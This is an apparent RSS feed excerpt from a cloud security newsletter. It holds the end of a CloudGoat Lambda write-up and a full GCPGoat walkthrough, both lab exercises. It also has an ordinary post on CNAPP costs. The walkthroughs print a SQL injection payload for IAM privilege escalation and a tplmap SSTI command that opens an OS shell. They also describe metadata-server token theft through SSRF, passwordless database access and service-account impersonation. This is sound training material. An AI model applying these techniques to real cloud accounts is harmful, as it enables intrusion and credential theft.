class="paragraph" style="text-align:left;">The database contains a list of allowed policies. SQLite3 can be utilized to interact with my_database.db, revealing that ‘AdministratorAccess’ is not an approved policy, as it is marked as not public.</p><div class="codeblock"><pre><code>sqlite3 vulnerable_lambda_cgidr2hk6ccycu-policy_applier_lambda1/my_database.db</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/792cd444-41b9-4c89-b677-332209cc350b/cg-vuln-lambda-15.png?t=1731248983"/></div><p class="paragraph" style="text-align:left;">To obtain the ‘<b>AdministratorAccess</b>‘ policy, craft a SQL injection payload and invoke the lambda function. The JSON payload would be:</p><div class="codeblock"><pre><code>&#123;
    &quot;policy_names&quot;: [
        &quot;AdministratorAccess&#39; --&quot;
    ],
    &quot;user_name&quot;: &quot;cg-bilbo-vulnerable_lambda_cgidr2hk6ccycu&quot;
&#125;</code></pre></div><p class="paragraph" style="text-align:left;"><code>-- </code><b> </b> will comment out the <code>public=True</code> section, causing the lambda function to apply the “AdministratorAccess” policy to the user. Now, pass this payload as base64 encoded in the command.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/853f5243-0742-4751-8075-48146977c7a3/cg-vuln-lambda-16.png?t=1731249054"/></div><p class="paragraph" style="text-align:left;">The output confirms that the policy was successfully applied. We can be verify it using <code>iam:ListAttachedUserPolicies</code>.</p><div class="codeblock"><pre><code>aws --profile bilbo iam list-attached-user-policies --user-name cg-bilbo-vulnerable_lambda_cgidr2hk6ccycu</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/ae19fbb1-3145-4486-8a2b-327290e0b441/cg-vuln-lambda-17.png?t=1731249076"/></div><p class="paragraph" style="text-align:left;">Now that our bilbo user has been granted the “AdministratorAccess” policy, let’s try to achieve the scenario’s goal of finding the secrets.</p><p class="paragraph" style="text-align:left;">Attempting to list secrets from the Secrets Manager:</p><div class="codeblock"><pre><code>aws --profile bilbo secretsmanager list-secrets</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/59b9872a-0108-4dd5-85c9-86414940508f/cg-vuln-lambda-18.png?t=1731249105"/></div><p class="paragraph" style="text-align:left;">Utilize <code>secretsmanager:GetSecretValue</code> to retrieve the value of the secret string.</p><div class="codeblock"><pre><code>aws --profile bilbo secretsmanager get-secret-value --secret-id &lt;arn&gt;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/11a5ba94-5d94-4486-9649-d5d58d330030/cg-vuln-lambda-19.png?t=1731249135"/></div><p class="paragraph" style="text-align:left;">The value of the SecretString is “<i><b>cg-secret-846237-284529</b></i>,” and with this, we complete the Cloudgoat scenario.</p></div><div class='beehiiv__footer'><br class='beehiiv__footer__break'><hr class='beehiiv__footer__line'><a target="_blank" class="beehiiv__footer_link" style="text-align: center;" href="https://www.beehiiv.com/?utm_campaign=7e297a3f-1663-4661-88bd-f6346a587cfb&utm_medium=post_rss&utm_source=cloud_security_club">Powered by beehiiv</a></div></div>
  ]]></content:encoded>
</item>

      <item>
  <title>Solving GCP Goat</title>
  <description>Step-by-step guide to solving GCPGoat - hands-on challenges to learn GCP security by identifying and remediating misconfigurations.</description>
      <enclosure url="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/f27ec9a4-4cfe-447b-b6f9-38039ab1bd02/GCP_Goat_Cover.jpg" length="25427" type="image/jpeg"/>
  <link>https://cloudsecurity.club/p/solving-gcp-goat</link>
  <guid isPermaLink="true">https://cloudsecurity.club/p/solving-gcp-goat</guid>
  <pubDate>Sun, 16 Jun 2024 18:30:00 +0000</pubDate>
  <atom:published>2024-06-16T18:30:00Z</atom:published>
    <dc:creator>Sarthak Bokade</dc:creator>
    <category><![CDATA[Ctf]]></category>
    <category><![CDATA[Gcp]]></category>
  <content:encoded><![CDATA[
    <div class='beehiiv'><style>
  .bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
  .bh__table_cell { padding: 5px; background-color: #FFFFFF; }
  .bh__table_cell p { color: #2D2D2D; font-family: 'Helvetica',Arial,sans-serif !important; overflow-wrap: break-word; }
  .bh__table_header { padding: 5px; background-color:#F1F1F1; }
  .bh__table_header p { color: #2A2A2A; font-family:'Trebuchet MS','Lucida Grande',Tahoma,sans-serif !important; overflow-wrap: break-word; }
</style><div class='beehiiv__body'><p class="paragraph" style="text-align:left;"><a class="link" href="https://github.com/JOSHUAJEBARAJ/GCP-GOAT?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-gcp-goat" target="_blank" rel="noopener noreferrer nofollow">GCPGoat</a> (by Joshua Jebaraj) focuses on providing a comprehensive learning environment for GCP security. It includes scenarios for attacking various GCP services, such as Google Kubernetes Engine (GKE), Cloud Storage, SQL instances, and App Engine. </p><p class="paragraph" style="text-align:left;">This project differs from <a class="link" href="https://cloudsecurity.club/archive?tags=GCP&utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-gcp-goat" target="_blank" rel="noopener noreferrer nofollow">other vulnerable GCP projects</a> we have checked out.</p><p class="paragraph" style="text-align:left;">This project is not a CTF, so there’s no flag under each scenario. Rather, it’s a set of challenges containing misconfigured GCP resources. Each challenge has a clear title denoting the misconfigured resource (like GCS, GKE, etc.). </p><p class="paragraph" style="text-align:left;">The lab setup could be more straightforward. For some challenges, there are more steps apart from <code>terraform init</code> and <code>terraform apply</code>.</p><p class="paragraph" style="text-align:left;">If you want to quickly jump to solution of a particular challenge, here you go:</p><ul><li><p class="paragraph" style="text-align:left;"><a class="link" href="#attacking-gcs" rel="noopener noreferrer nofollow">Attacking GCS</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="#attacking-sql-instance" rel="noopener noreferrer nofollow">Attacking SQL instance</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="#attacking-artifact-registry" rel="noopener noreferrer nofollow">Attacking Artifact registry</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="#attacking-gke" rel="noopener noreferrer nofollow">Attacking GKE</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="#attacking-google-app-engine" rel="noopener noreferrer nofollow">Attacking Google App Engine</a></p></li><li><p class="paragraph" style="text-align:left;"><a class="link" href="#privilege-escalation" rel="noopener noreferrer nofollow">Privilege escalation</a></p></li></ul><h1 class="heading" style="text-align:left;" id="attacking-gcs">Attacking GCS</h1><p class="paragraph" style="text-align:left;">You can set up the challenge as per the <a class="link" href="https://gcpgoat.joshuajebaraj.com/attacking-gcs?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-gcp-goat" target="_blank" rel="noopener noreferrer nofollow">documentation</a>.</p><p class="paragraph" style="text-align:left;">During the setup, we set the unique bucket name as “gcpcsc123” and the challenge has created a GCS bucket – <b>gcpcsc123-backup</b></p><div class="codeblock"><pre><code>gsutil ls</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/1d2c5913-ab67-4efa-aaa8-0f577e86ee7a/image-1.png?t=1731246980"/></div><p class="paragraph" style="text-align:left;">Now, let’s try to access this storage bucket without using our service account.</p><p class="paragraph" style="text-align:left;">Simply visiting this storage bucket URL shows that all of the bucket objects are publicly list</p><div class="codeblock"><pre><code>https://storage.googleapis.com/storage/v1/b/&lt;gcpgoat-bucket&gt;/o</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/3b1b3dca-29b2-4da1-9c5c-c0b80d416826/image-2.png?t=1731247007"/></div><p class="paragraph" style="text-align:left;">We see <code>juice-shop.zip</code> present in the bucket. We can download the ZIP file by visiting the URL</p><div class="codeblock"><pre><code>https://storage.googleapis.com/storage/v1/b/&lt;gcpgoat-bucket&gt;/o/juice-shop.zip?alt=media</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/58e08f92-91f7-4b9e-8f83-9801009e14dc/image-3.png?t=1731247040"/></div><p class="paragraph" style="text-align:left;">Extracting the zip file, we can find the secret.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/d4f5e5f6-7be8-432b-b29f-b674e03f8adc/image-4.png?t=1731247058"/></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/41dbd94b-ad50-4ed3-83be-dd89490dc516/image-5.png?t=1731247070"/></div><h1 class="heading" style="text-align:left;" id="attacking-sql-instance">Attacking SQL instance</h1><p class="paragraph" style="text-align:left;">You can set up the challenge as per the <a class="link" href="https://gcpgoat.joshuajebaraj.com/attacking-sql?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-gcp-goat" target="_blank" rel="noopener noreferrer nofollow">documentation</a>.</p><p class="paragraph" style="text-align:left;">This challenge creates a database and gives the public IP of the database in the output. In our case, the DB’s IP is <b>35.194.155.109.</b></p><p class="paragraph" style="text-align:left;">Let’s check if the database is publicly exposed.</p><div class="codeblock"><pre><code>nmap -Pn &lt;EXTERNAL_IP&gt;</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/a94a6846-82bd-46d2-90f0-b7431c32f92b/image-6.png?t=1731247120"/></div><p class="paragraph" style="text-align:left;">We see that port 3306 is open for connections.</p><p class="paragraph" style="text-align:left;">Let’s try to log in to MySQL using MySQL Client. (You can install the client using <code>sudo apt install mysql-client-core-8.0</code>)</p><p class="paragraph" style="text-align:left;">The database lets us log in without a password!</p><div class="codeblock"><pre><code>mysql -u root -h 35.194.155.109</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/1d7d839f-ce5d-4c92-b0b4-87947e61694c/image-7.png?t=1731247142"/></div><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:left;"><b>Note:</b> This database allowed login without a password, but such databases are rare</p><figcaption class="blockquote__byline"></figcaption></blockquote></div><p class="paragraph" style="text-align:left;">By running this command, we successfully logged in to the database instance, and now we can search for some vital information from here.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/85d4f426-953f-4e0b-8f9b-2c51d2be0260/image-8.png?t=1731247170"/></div><p class="paragraph" style="text-align:left;">With this, we were able to access the database instance. It didn’t contain any sensitive data or flags.</p><h1 class="heading" style="text-align:left;" id="attacking-artifact-registry">Attacking Artifact registry</h1><p class="paragraph" style="text-align:left;">You can set up the challenge as per the <a class="link" href="https://gcpgoat.joshuajebaraj.com/attacking-artifact-registry?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-gcp-goat" target="_blank" rel="noopener noreferrer nofollow">documentation</a>. This setup involves quite a few steps and could be more straightforward.</p><p class="paragraph" style="text-align:left;">As per the CTF description, this scenario assumes that we have found the project and repo names. </p><p class="paragraph" style="text-align:left;">In our case, the project name is <code>cloudsecurity-dev</code>, and the repo name is <code>gcp-goat/secret</code>.</p><p class="paragraph" style="text-align:left;">The container registry hostname follows the <code>&lt;region&gt;-docker.pkg.dev</code> pattern. Trying to find the location shows our registry is in the us-central1 region</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/f1cdb55e-7576-4bb8-9b9d-ffd04e750f84/image-9.png?t=1731247207"/></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/f47ef770-d1f6-47da-b055-6258ac5a8bca/image-10.png?t=1731247230"/></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/6598b895-c06e-46cf-8681-40b832b3c7c5/image-11.png?t=1731247243"/></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/538de2b1-9356-4d2d-b591-f5c15a1dd786/image-12.png?t=1731247256"/></div><p class="paragraph" style="text-align:left;">Now, we will download and run this Docker image.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/1209e724-2c91-4056-9d22-a1f09af15acc/image-13.png?t=1731247270"/></div><p class="paragraph" style="text-align:left;">We can find the file <code>creds.json</code> inside the container containing the service account key.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/fa06e8cd-c89a-4c6b-9192-18b595820d37/image-14.png?t=1731247287"/></div><h1 class="heading" style="text-align:left;" id="attacking-gke">Attacking GKE</h1><p class="paragraph" style="text-align:left;">You can set up the challenge as per the <a class="link" href="https://gcpgoat.joshuajebaraj.com/attacking-gke?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-gcp-goat#attacking-google-kubernetes-engine" target="_blank" rel="noopener noreferrer nofollow">documentation</a>. </p><p class="paragraph" style="text-align:left;">After successfully deploying the challenge, we get the entry point to the challenge - <code>http://&lt;external_ip_of_node&gt;:30003/page</code><b>.</b> </p><p class="paragraph" style="text-align:left;">Visiting the page shows us the following web page:</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/2f40219b-37ee-446f-9a7d-52e9f8895f26/image-15.png?t=1731247335"/></div><p class="paragraph" style="text-align:left;">After testing for several server-side injections (command injection, SQLi, etc.), server-side template injection worked.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/56af3abb-fc85-4f05-9bd5-99dcd8a75b10/image-16.png?t=1731247353"/></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/3bb993af-c103-4103-bc57-fb120aabe5b0/image-17.png?t=1731247365"/></div><p class="paragraph" style="text-align:left;">Now, we will exploit this SSTI vulnerability with the tool <a class="link" href="https://github.com/epinna/tplmap?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-gcp-goat" target="_blank" rel="noopener noreferrer nofollow">tplmap</a>.</p><div class="codeblock"><pre><code>python3 tplmap.py -u http://&lt;node-external-ip&gt;:30003/page?name=gcp-goat --os-shell</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/fc0b5259-05cf-4767-8dec-80dabe71d4bb/image-18.png?t=1731247404"/></div><p class="paragraph" style="text-align:left;">We can now access everything from the shell in the application’s container.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/1b0cd7ed-1aa1-4800-af57-b5f4bab613c2/image-19.png?t=1731247420"/></div><p class="paragraph" style="text-align:left;">This container runs on Google Kubernetes Engine (GKE) nodes. Each GKE node has an attached <a class="link" href="https://cloud.google.com/kubernetes-engine/docs/how-to/service-accounts?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-gcp-goat#default-gke-service-agent" target="_blank" rel="noopener noreferrer nofollow">default service account (with Project Editor permissions)</a>. So, if you get a shell inside the container running on GKE, you can view and modify other resources in the project.</p><p class="paragraph" style="text-align:left;">For example, I can list the project’s GCS buckets and VM instances from the container.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/3c802c86-0dfc-4336-915b-59f2bf83015b/image-20.png?t=1731247446"/></div><h1 class="heading" style="text-align:left;" id="attacking-google-app-engine">Attacking Google App Engine</h1><p class="paragraph" style="text-align:left;">You can set up this challenge by following the documentation.</p><p class="paragraph" style="text-align:left;">This challenge deploys an <a class="link" href="https://cloud.google.com/appengine/docs/?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-gcp-goat" target="_blank" rel="noopener noreferrer nofollow">App Engine</a> app that provides us with the URL <code>https://cloudsecurityclub-dev.wl.r.appspot.com</code></p><p class="paragraph" style="text-align:left;">Visiting the URL shows the following webpage:</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/8c92fa14-12a7-478b-b2e6-0b0da9f4e4bd/image-21.png?t=1731247477"/></div><p class="paragraph" style="text-align:left;">As this application takes any URL as input, let’s try passing the <a class="link" href="https://cloud.google.com/appengine/docs/legacy/standard/java/accessing-instance-metadata?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-gcp-goat" target="_blank" rel="noopener noreferrer nofollow">Instance Metadata endpoint</a> to it along with the header <code>Metadata-Flavor: Google</code>.</p><p class="paragraph" style="text-align:left;">The metadata server is at <code>http://metadata.google.internal</code>, and the endpoint that grants temporary credentials is at <code>/computeMetadata/v1/instance/service-accounts/default/token</code>. Let’s try accessing it.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/29d0918b-67ff-4123-b2e8-4c1a18011940/image-22.png?t=1731247495"/></div><p class="paragraph" style="text-align:left;">We got the access token corresponding to the service account, which we can use to access the resources.</p><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/d307d8df-de37-4158-86c9-8f04243588de/image-23.png?t=1731247510"/></div><h1 class="heading" style="text-align:left;" id="privilege-escalation">Privilege escalation</h1><p class="paragraph" style="text-align:left;">You can set up the challenge as per the <a class="link" href="https://gcpgoat.joshuajebaraj.com/privilege-escalation-sa?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-gcp-goat" target="_blank" rel="noopener noreferrer nofollow">documentation</a>. </p><p class="paragraph" style="text-align:left;">The challenge provides us with a service account key. Let’s find the permissions of the service account.</p><div class="codeblock"><pre><code>python3 test-permissions.py creds.json</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/2cc979ee-d8df-4f7e-b556-5cfe9265351d/image-24.png?t=1731247533"/></div><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:left;"><b>Note:</b> This <code>test-permissions.py</code> script is a fork of the <a class="link" href="https://github.com/NicholasSpringer/thunder-ctf/blob/master/scripts/test-permissions.py?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-gcp-goat" target="_blank" rel="noopener noreferrer nofollow">Thunder-CTF project</a>. We have modified it to check the permissions related to the <code>creds.json</code> file, in order to display the permissions associated with this service account.</p><figcaption class="blockquote__byline"></figcaption></blockquote></div><p class="paragraph" style="text-align:left;">Now, we will impersonate other service accounts using this service account. Impersonation provides the current user/service account with the privileges of some service account.</p><p class="paragraph" style="text-align:left;">With this command, we export the email of the compute engine’s default service account.</p><div class="codeblock"><pre><code>export SA_EMAIL=$(gcloud projects describe $PROJECT_ID --format=&quot;value(projectNumber)&quot;)-compute@developer.gserviceaccount.com</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/3e81a91d-4537-4868-a269-8ee3befd8424/image-25.png?t=1731247593"/></div><p class="paragraph" style="text-align:left;">With this command, we impersonated the service account with the privileges of the default-compute-engine’s service account.</p><div class="codeblock"><pre><code>gcloud config set auth/impersonate_service_account $SA_EMAIL</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/a6b69186-9a89-45cd-bfb3-7afd35ff8e77/image-26.png?t=1731247615"/></div><div class="blockquote"><blockquote class="blockquote__quote"><p class="paragraph" style="text-align:left;"><b>NOTE:</b> The default service account used to have the automatic permission (Editor Role) attached to it by default, but from 03 May 2024 onwards, <a class="link" href="https://cloud.google.com/compute/docs/access/service-accounts?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=solving-gcp-goat#default_service_account" target="_blank" rel="noopener noreferrer nofollow">this automatic role is disabled</a>. So, our default compute engines don’t have any permissions associated with them, but earlier, they used to have the Editor role associated with them for the project.</p><figcaption class="blockquote__byline"></figcaption></blockquote></div><p class="paragraph" style="text-align:left;">So, to demonstrate this scenario and how we can impersonate the permissions of other SAs to the particular SA, we will explicitly set the EDITOR role for the default service account for the compute engine.</p><div class="codeblock"><pre><code>gsutil ls</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/8526c286-f2a6-4efb-9625-3fc20f435ec7/image-27.png?t=1731247649"/></div><p class="paragraph" style="text-align:left;">The permissions of the default compute engine’s SA help us list the contents of the buckets.</p><div class="codeblock"><pre><code>gcloud compute instance list</code></pre></div><div class="image"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/540eadbe-03bf-4fc3-b4a4-274d89b0aeb2/image-28.png?t=1731247670"/></div><p class="paragraph" style="text-align:left;">With this we have completed all the challenges.</p></div><div class='beehiiv__footer'><br class='beehiiv__footer__break'><hr class='beehiiv__footer__line'><a target="_blank" class="beehiiv__footer_link" style="text-align: center;" href="https://www.beehiiv.com/?utm_campaign=d54a0912-4a7a-4d2e-bc51-6e2d6642f2b1&utm_medium=post_rss&utm_source=cloud_security_club">Powered by beehiiv</a></div></div>
  ]]></content:encoded>
</item>

      <item>
  <title>Hidden Costs of CNAPP Solutions</title>
  <description></description>
      <enclosure url="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/89fd1e61-98b8-4d0e-927b-45ae47dbe874/Hidden_Cost_of_CNAPP_Cover.jpg" length="36627" type="image/jpeg"/>
  <link>https://cloudsecurity.club/p/hidden-costs-of-cnapp-solutions</link>
  <guid isPermaLink="true">https://cloudsecurity.club/p/hidden-costs-of-cnapp-solutions</guid>
  <pubDate>Thu, 23 May 2024 18:30:00 +0000</pubDate>
  <atom:published>2024-05-23T18:30:00Z</atom:published>
    <dc:creator>Chandrapal Badshah</dc:creator>
    <category><![CDATA[Gcp]]></category>
    <category><![CDATA[Cnapp]]></category>
    <category><![CDATA[Aws]]></category>
    <category><![CDATA[Azure]]></category>
  <content:encoded><![CDATA[
    <div class='beehiiv'><style>
  .bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
  .bh__table_cell { padding: 5px; background-color: #FFFFFF; }
  .bh__table_cell p { color: #2D2D2D; font-family: 'Helvetica',Arial,sans-serif !important; overflow-wrap: break-word; }
  .bh__table_header { padding: 5px; background-color:#F1F1F1; }
  .bh__table_header p { color: #2A2A2A; font-family:'Trebuchet MS','Lucida Grande',Tahoma,sans-serif !important; overflow-wrap: break-word; }
</style><div class='beehiiv__body'><p class="paragraph" style="text-align:left;">I’ve had my fair share of experience evaluating, procuring, and running a CNAPP solution in production environments, especially on AWS and GCP. I’ve seen their benefits and drawbacks, whether it’s agentless workload scanning or agent-based real-time protection.</p><p class="paragraph" style="text-align:left;">Do you believe the annual cost of $100,000 for a CNAPP means you will only spend $100,000? </p><p class="paragraph" style="text-align:left;">Let me upset you. The short answer is NO.</p><p class="paragraph" style="text-align:left;">When it comes to the cost of a CNAPP, a naive mistake is to think the price written on the contract, after the battle between your procurement team and the vendor’s sales team, is final.</p><p class="paragraph" style="text-align:left;">The hidden costs of operationalizing the CNAPP are often not highlighted. Not even the best, highest-ranking SEO-optimized CNAPP buyer guides mention this.</p><p class="paragraph" style="text-align:left;">In this blog post, I’ll share some insider insights and lessons to help you make informed decisions when considering a CNAPP for your organization.</p><h1 class="heading" style="text-align:left;" id="the-sad-reality-of-additional-expen">The Sad Reality of Additional Expenses</h1><p class="paragraph" style="text-align:left;">These are some of the ways I have seen CNAPP solutions add additional costs (in no particular order):</p><ul><li><p class="paragraph" style="text-align:left;"><b>Enabling new log sources and security services:</b> CNAPPs might require additional logging to feed their machine-learning models or advanced threat detection. You might also need to enable a cloud platform-specific security service (GuardDuty, etc.). If you enable new log sources and security services just for the CNAPP, the costs must be attributed to the CNAPPs.</p></li><li><p class="paragraph" style="text-align:left;"><b>Shipping CNAPP logs to other places:</b> If you have a SIEM/XDR solution and want the CNAPP logs sent to it, then yes, you guessed it right—it costs money. This expense is dependent on the number of logs generated and shipped.</p></li><li><p class="paragraph" style="text-align:left;"><b>Self-hosting scanners can cost you a lot of money:</b> If your organization is subject to strict regulatory requirements, you may need to run agentless scans within your cloud accounts. Hosting the vendor’s proprietary scanners on your infrastructure incurs massive additional costs, which will grow with your workload and scanning frequency.</p></li><li><p class="paragraph" style="text-align:left;"><b>Agents scale with your workloads: </b>For those using agents in their infrastructure, such as Kubernetes agents, remember that these agents eat up some memory on each VM. If you just had 30-50 worker nodes, you may need to add a few more nodes to make some space for agents in each worker node and distribute the existing load on new VMs.</p></li></ul><h1 class="heading" style="text-align:left;" id="some-negligible-costs-that-are-stil">Some negligible costs that are still not zero</h1><ul><li><p class="paragraph" style="text-align:left;"><b>Encryption and Key Management: </b>If you opt for agentless scanning, you’ll need to consider the cost of the encryption keys used to encrypt and send snapshots to the vendor. Managing encryption keys adds a small fee, but with the security best practice of automatic key rotation, you will have spent a noticeable chunk in a few years.</p></li><li><p class="paragraph" style="text-align:left;"><b>Costs of Cloud API and API throttling:</b> While accessing cloud APIs to retrieve information may seem negligible, the costs can accumulate over time, especially if your CNAPP makes frequent requests. I’ve had (<i>unfortunate</i>) firsthand experiences of a spike in S3 costs (due to frequent <code>s3:ListObjects</code> calls) and even AWS API Throttling (that led to a production incident) due to frequent API requests to list 1000s of AWS Glue Tables for inventory purposes.</p></li><li><p class="paragraph" style="text-align:left;"><b>Time spent on CI/CD pipelines isn’t free: </b>Integrating CNAPP agents into your CI/CD pipeline to “shift left” can lead to increased CI/CD time and resource consumption, which translates to added expenses. These costs depend on how you have configured your security stages in the pipeline. Scanning every push in the dev environment is more costly than scanning every PR merged to staging/UAT.</p></li></ul><p class="paragraph" style="text-align:left;">These are some hidden costs I found after deploying the CNAPP solution. </p><p class="paragraph" style="text-align:left;">You shouldn’t mistake this for vendors not doing anything. I’ve seen vendors doing optimization on their end, like hosting their scanners in the same region and availability zone as the customer, optimizing agent memory consumption, etc. </p><p class="paragraph" style="text-align:left;">If you plan to procure a CNAPP, explicitly ask about the additional costs of running the tool. Higher costs should mean more credits in the final quote. 😉</p><div class="image"><a class="image__link" href="https://cal.com/badshah/discovery?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=hidden-costs-of-cnapp-solutions" rel="noopener" target="_blank"><img alt="" class="image__image" style="" src="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/1488b6a6-ad63-45a1-a60f-4131389633e7/Screenshot_2025-01-07_at_9.41.07_PM.png?t=1736266293"/></a><div class="image__source"><a class="image__source_link" href="https://cal.com/badshah/discovery?utm_source=cloudsecurity.club&utm_medium=newsletter&utm_campaign=hidden-costs-of-cnapp-solutions" rel="noopener" target="_blank"><span class="image__source_text"><p>Let’s Connect!</p></span></a></div></div></div><div class='beehiiv__footer'><br class='beehiiv__footer__break'><hr class='beehiiv__footer__line'><a target="_blank" class="beehiiv__footer_link" style="text-align: center;" href="https://www.beehiiv.com/?utm_campaign=09ee88af-d49b-4ca0-a355-4dc4fa4aaa53&utm_medium=post_rss&utm_source=cloud_security_club">Powered by beehiiv</a></div></div>
  ]]></content:encoded>
</item>

      <item>
  <title>AWS Pentesting Best Practices: SecurityAudit, ReadOnly, or ViewOnly?</title>
  <description>Explore the best IAM policies for AWS pentesting. Learn the pros and cons of SecurityAudit, ReadOnly, and ViewOnly policies to ensure robust cloud security. </description>
      <enclosure url="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/uploads/asset/file/9d9893e8-933c-4be8-9811-a22d6c602262/AWS_SecurityAudit_Cover.jpg" length="36942" type="image/jpeg"/>
